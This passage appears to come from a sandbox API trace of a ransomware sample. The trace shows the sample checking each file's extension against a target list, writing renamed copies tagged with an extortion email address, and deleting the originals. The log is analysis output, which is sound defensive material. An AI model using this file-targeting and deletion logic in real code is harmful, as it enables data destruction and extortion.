Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00625_.wmf")) returned 1 [0067.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 68 [0067.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 68 [0067.109] lstrlenW (lpString=".doc") returned 4 [0067.109] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0067.109] lstrlenW (lpString=".docx") returned 5 [0067.109] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0067.109] lstrlenW (lpString=".pdf") returned 4 [0067.109] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0067.109] lstrlenW (lpString=".xls") returned 4 [0067.109] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0067.109] lstrlenW (lpString=".xlsx") returned 5 [0067.109] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0067.109] lstrlenW (lpString=".ppt") returned 4 [0067.109] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0067.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 68 [0067.109] lstrlenW (lpString=".zip") returned 4 [0067.109] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0067.109] lstrlenW (lpString=".rar") returned 4 [0067.109] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0067.109] lstrlenW (lpString=".bz2") returned 4 [0067.109] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0067.109] lstrlenW (lpString=".7z") returned 3 [0067.109] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0067.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 68 [0067.109] lstrlenW (lpString=".dbf") returned 4 [0067.109] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0067.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 68 [0067.109] lstrlenW (lpString=".1cd") returned 4 [0067.110] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0067.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 68 [0067.110] lstrlenW (lpString=".jpg") returned 4 [0067.110] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0067.110] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.110] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.110] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00669_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0067.111] GetLastError () returned 0x0 [0067.111] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x2ce2, lpOverlapped=0x0) returned 1 [0067.123] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x2cf0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x2cf0, lpOverlapped=0x0) returned 1 [0067.123] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0067.124] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0067.124] SetEndOfFile (hFile=0x2c0) returned 1 [0067.124] CloseHandle (hObject=0x2c0) returned 1 [0067.124] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.124] SetEndOfFile (hFile=0x340) returned 1 [0067.125] CloseHandle (hObject=0x340) returned 1 [0067.125] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0067.125] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00669_.wmf")) returned 1 [0067.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 68 [0067.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 68 [0067.125] lstrlenW (lpString=".doc") returned 4 [0067.125] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0067.126] lstrlenW (lpString=".docx") returned 5 [0067.126] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0067.126] lstrlenW (lpString=".pdf") returned 4 [0067.126] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0067.126] lstrlenW (lpString=".xls") returned 4 [0067.126] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0067.126] lstrlenW (lpString=".xlsx") returned 5 [0067.126] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0067.126] lstrlenW (lpString=".ppt") returned 4 [0067.126] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0067.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 68 [0067.126] lstrlenW (lpString=".zip") returned 4 [0067.126] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0067.126] lstrlenW (lpString=".rar") returned 4 [0067.126] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0067.126] lstrlenW (lpString=".bz2") returned 4 [0067.126] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0067.126] lstrlenW (lpString=".7z") returned 3 [0067.126] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0067.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 68 [0067.126] lstrlenW (lpString=".dbf") returned 4 [0067.126] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0067.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 68 [0067.126] lstrlenW (lpString=".1cd") returned 4 [0067.126] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0067.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00669_.WMF") returned 68 [0067.126] lstrlenW (lpString=".jpg") returned 4 [0067.126] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0067.127] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.127] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00687_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0067.127] GetLastError () returned 0x0 [0067.127] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x10f4, lpOverlapped=0x0) returned 1 [0067.894] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1100, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1100, lpOverlapped=0x0) returned 1 [0068.122] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.122] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.122] SetEndOfFile (hFile=0x2c0) returned 1 [0068.122] CloseHandle (hObject=0x2c0) returned 1 [0068.122] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.122] SetEndOfFile (hFile=0x340) returned 1 [0068.224] CloseHandle (hObject=0x340) returned 1 [0068.224] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.224] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00687_.wmf")) returned 1 [0068.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 68 [0068.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 68 [0068.225] lstrlenW (lpString=".doc") returned 4 [0068.225] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.225] lstrlenW (lpString=".docx") returned 5 [0068.225] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.225] lstrlenW (lpString=".pdf") returned 4 [0068.225] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.225] lstrlenW (lpString=".xls") returned 4 [0068.225] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.225] lstrlenW (lpString=".xlsx") returned 5 [0068.225] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.225] lstrlenW (lpString=".ppt") returned 4 [0068.225] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 68 [0068.225] lstrlenW (lpString=".zip") returned 4 [0068.225] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.225] lstrlenW (lpString=".rar") returned 4 [0068.225] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.225] lstrlenW (lpString=".bz2") returned 4 [0068.225] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.225] lstrlenW (lpString=".7z") returned 3 [0068.225] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 68 [0068.225] lstrlenW (lpString=".dbf") returned 4 [0068.225] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 68 [0068.225] lstrlenW (lpString=".1cd") returned 4 [0068.225] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF") returned 68 [0068.225] lstrlenW (lpString=".jpg") returned 4 [0068.226] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.226] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.226] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01242_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0068.227] GetLastError () returned 0x0 [0068.227] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x1cac, lpOverlapped=0x0) returned 1 [0068.257] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1cb0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1cb0, lpOverlapped=0x0) returned 1 [0068.257] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.257] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.258] SetEndOfFile (hFile=0x2c0) returned 1 [0068.258] CloseHandle (hObject=0x2c0) returned 1 [0068.258] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.258] SetEndOfFile (hFile=0x340) returned 1 [0068.259] CloseHandle (hObject=0x340) returned 1 [0068.259] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.259] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01242_.wmf")) returned 1 [0068.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 68 [0068.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 68 [0068.259] lstrlenW (lpString=".doc") returned 4 [0068.259] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.259] lstrlenW (lpString=".docx") returned 5 [0068.259] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.259] lstrlenW (lpString=".pdf") returned 4 [0068.259] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.259] lstrlenW (lpString=".xls") returned 4 [0068.259] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.259] lstrlenW (lpString=".xlsx") returned 5 [0068.259] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.259] lstrlenW (lpString=".ppt") returned 4 [0068.259] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 68 [0068.259] lstrlenW (lpString=".zip") returned 4 [0068.259] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.260] lstrlenW (lpString=".rar") returned 4 [0068.260] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.260] lstrlenW (lpString=".bz2") returned 4 [0068.260] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.260] lstrlenW (lpString=".7z") returned 3 [0068.260] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 68 [0068.260] lstrlenW (lpString=".dbf") returned 4 [0068.260] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 68 [0068.260] lstrlenW (lpString=".1cd") returned 4 [0068.260] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 68 [0068.260] lstrlenW (lpString=".jpg") returned 4 [0068.260] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.260] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.260] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01618_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0068.261] GetLastError () returned 0x0 [0068.261] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x1c80, lpOverlapped=0x0) returned 1 [0068.335] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1c90, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1c90, lpOverlapped=0x0) returned 1 [0068.336] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.336] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.336] SetEndOfFile (hFile=0x2c0) returned 1 [0068.336] CloseHandle (hObject=0x2c0) returned 1 [0068.336] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.336] SetEndOfFile (hFile=0x340) returned 1 [0068.337] CloseHandle (hObject=0x340) returned 1 [0068.337] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.337] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01618_.wmf")) returned 1 [0068.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 68 [0068.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 68 [0068.338] lstrlenW (lpString=".doc") returned 4 [0068.338] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.338] lstrlenW (lpString=".docx") returned 5 [0068.338] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.338] lstrlenW (lpString=".pdf") returned 4 [0068.338] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.338] lstrlenW (lpString=".xls") returned 4 [0068.338] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.338] lstrlenW (lpString=".xlsx") returned 5 [0068.338] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.338] lstrlenW (lpString=".ppt") returned 4 [0068.338] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 68 [0068.338] lstrlenW (lpString=".zip") returned 4 [0068.338] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.338] lstrlenW (lpString=".rar") returned 4 [0068.338] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.338] lstrlenW (lpString=".bz2") returned 4 [0068.338] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.338] lstrlenW (lpString=".7z") returned 3 [0068.338] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 68 [0068.338] lstrlenW (lpString=".dbf") returned 4 [0068.338] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 68 [0068.338] lstrlenW (lpString=".1cd") returned 4 [0068.338] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 68 [0068.338] lstrlenW (lpString=".jpg") returned 4 [0068.338] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.339] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.339] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02298_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0068.339] GetLastError () returned 0x0 [0068.339] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x15b0, lpOverlapped=0x0) returned 1 [0068.349] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x15c0, lpOverlapped=0x0) returned 1 [0068.350] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.350] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.350] SetEndOfFile (hFile=0x2c0) returned 1 [0068.350] CloseHandle (hObject=0x2c0) returned 1 [0068.350] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.350] SetEndOfFile (hFile=0x340) returned 1 [0068.351] CloseHandle (hObject=0x340) returned 1 [0068.351] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.351] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02298_.wmf")) returned 1 [0068.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 68 [0068.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 68 [0068.352] lstrlenW (lpString=".doc") returned 4 [0068.352] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.352] lstrlenW (lpString=".docx") returned 5 [0068.352] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.352] lstrlenW (lpString=".pdf") returned 4 [0068.352] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.352] lstrlenW (lpString=".xls") returned 4 [0068.352] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.352] lstrlenW (lpString=".xlsx") returned 5 [0068.352] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.352] lstrlenW (lpString=".ppt") returned 4 [0068.352] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 68 [0068.352] lstrlenW (lpString=".zip") returned 4 [0068.352] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.352] lstrlenW (lpString=".rar") returned 4 [0068.352] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.352] lstrlenW (lpString=".bz2") returned 4 [0068.352] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.352] lstrlenW (lpString=".7z") returned 3 [0068.352] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 68 [0068.352] lstrlenW 